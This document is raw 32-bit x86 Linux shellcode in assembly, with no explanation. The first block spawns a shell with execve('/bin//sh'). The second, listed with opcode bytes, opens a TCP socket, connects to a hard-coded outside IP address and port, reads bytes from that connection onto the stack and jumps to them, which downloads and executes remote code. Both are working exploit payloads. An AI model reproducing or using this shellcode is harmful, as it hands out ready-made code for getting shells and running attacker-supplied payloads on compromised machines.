xor    eax,eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
push   eax
push   eax
pop ecx
pop edx
mov    al,0xb
int    0x80
-----------------------------------------

0:  6a 06                   push   0x6
2:  6a 01                   push   0x1
4:  6a 02                   push   0x2
6:  89 e1                   mov    ecx,esp
8:  6a 01                   push   0x1
a:  5b                      pop    ebx
b:  b0 66                   mov    al,0x66
d:  cd 80                   int    0x80

f:  68 67 68 77 37          push   0x37776867
14: 68 02 00 2b 67          push   0x672b0002
19: 89 e7                   mov    edi,esp
1b: 6a 10                   push   0x10
1d: 57                      push   edi
1e: 50                      push   eax
1f: 89 e1                   mov    ecx,esp
21: b3 03                   mov    bl,0x3
23: b0 66                   mov    al,0x66
25: cd 80                   int    0x80

27: 89 c3                   mov    ebx,eax
29: b0 03                   mov    al,0x3
2b: 89 e1                   mov    ecx,esp
2d: b2 23                   mov    dl,0x23
2f: cd 80                   int    0x80

31: 54                      push   esp
32: c3                      ret